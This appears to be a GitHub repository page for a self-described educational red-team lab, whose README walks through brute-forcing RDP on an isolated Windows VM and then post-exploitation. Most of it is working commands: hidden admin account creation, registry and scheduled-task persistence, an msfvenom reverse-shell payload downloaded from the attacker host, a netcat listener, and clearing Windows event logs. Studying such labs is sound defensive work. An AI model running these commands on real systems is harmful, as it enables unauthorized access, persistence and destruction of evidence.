Skip to content
/ RDP-bruteforce-attack-on-windows Public

simulate how an attacker could gain unauthorized access to a Windows machine via Remote Desktop Protocol (RDP) by brute-forcing weak credentials using RDP red team lab

1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

ne4tron/RDP-bruteforce-attack-on-windows

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

26 Commits
.gitignore
.gitignore
 
 
Hydra installation
Hydra installation
 
 
README.md
README.md
 
 
Report
Report
 
 
rdp_bruteforce.py
rdp_bruteforce.py
 
 
xfreerdp installation
xfreerdp installation
 
 

Repository files navigation

Advanced RDP Red Teaming Lab

Disclaimer

This project is for educational purposes only. All activities were conducted in a safe, isolated lab environment using virtual machines I own. Do not attempt this on any system you do not have explicit permission to test.

Table of Contents

Objective

Lab Setup

Recon & Scanning

RDP Brute-Force

Python Script

Access & Post-Exploitation

Privilege Escalation

Persistence

Backdoor Shell

Lateral Movement

Clean-Up

Reporting

Objective

Simulate a real-world red team operation by brute-forcing weak RDP credentials, then performing post-exploitation, persistence, and potential lateral movement on the compromised host.

Lab Setup

-attacker: kali linux

tools :hydra,nmap,xfreerdp,python

-victim:windows 10,

tools:RDP enabled,weak password

-Network: Host only,isolated,no internet.

Recon & Scanning

Scan RDP port with Nmap:

nmap -p 3389 <target_ip>

RDP Brute-Force

use the Python script automation available in code section bruteforce password faster.

Run with:

python3 rdp_bruteforce.py

Access & Post-Exploitation

xfreerdp /u:Administrator /p: /v:<target_ip> /cert:ignore

Inside RDP Session:

whoami hostname ipconfig /all systeminfo dir /s /b C:\Users\*.txt

Privilege Escalation

Check permissions:

whoami /groups

Run WinPEAS/SharpUp for local exploits (upload via RDP).

winPEAS.exe quiet cmd fast

Look for:

AlwaysInstallElevated

Unquoted service paths

Weak service permissions

Persistence

Add hidden admin user:

net user sysadmin P@ssw0rd123 /add net localgroup administrators sysadmin /add

Registry-based persistence:

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v updater /t REG_SZ /d "C:\rev.exe"

Scheduled Task:

schtasks /create /tn "Updater" /tr "C:\rev.exe" /sc onlogon

Backdoor Shell

Generate backdoor:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<kali_ip> LPORT=4444 -f exe -o rev.exe python3 -m http.server 80

Download in RDP:

powershell -c "Invoke-WebRequest -Uri http://<kali_ip>/rev.exe -OutFile C:\rev.exe"

Execute & catch:

nc -lvnp 4444

Lateral Movement

net view /domain net view \

Reuse dumped credentials to access other machines if available.

Clean-Up

Clear logs (not recommended unless simulating attacker evasion):

wevtutil cl Security wevtutil cl System

Delete backdoors, users, and payloads.

Reporting

Document:

Entry vector

Credentials cracked

Privilege escalation method

Persistence mechanism

Tools/scripts used

Detection logs

Mitigation recommendations

About

simulate how an attacker could gain unauthorized access to a Windows machine via Remote Desktop Protocol (RDP) by brute-forcing weak credentials using RDP red team lab

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages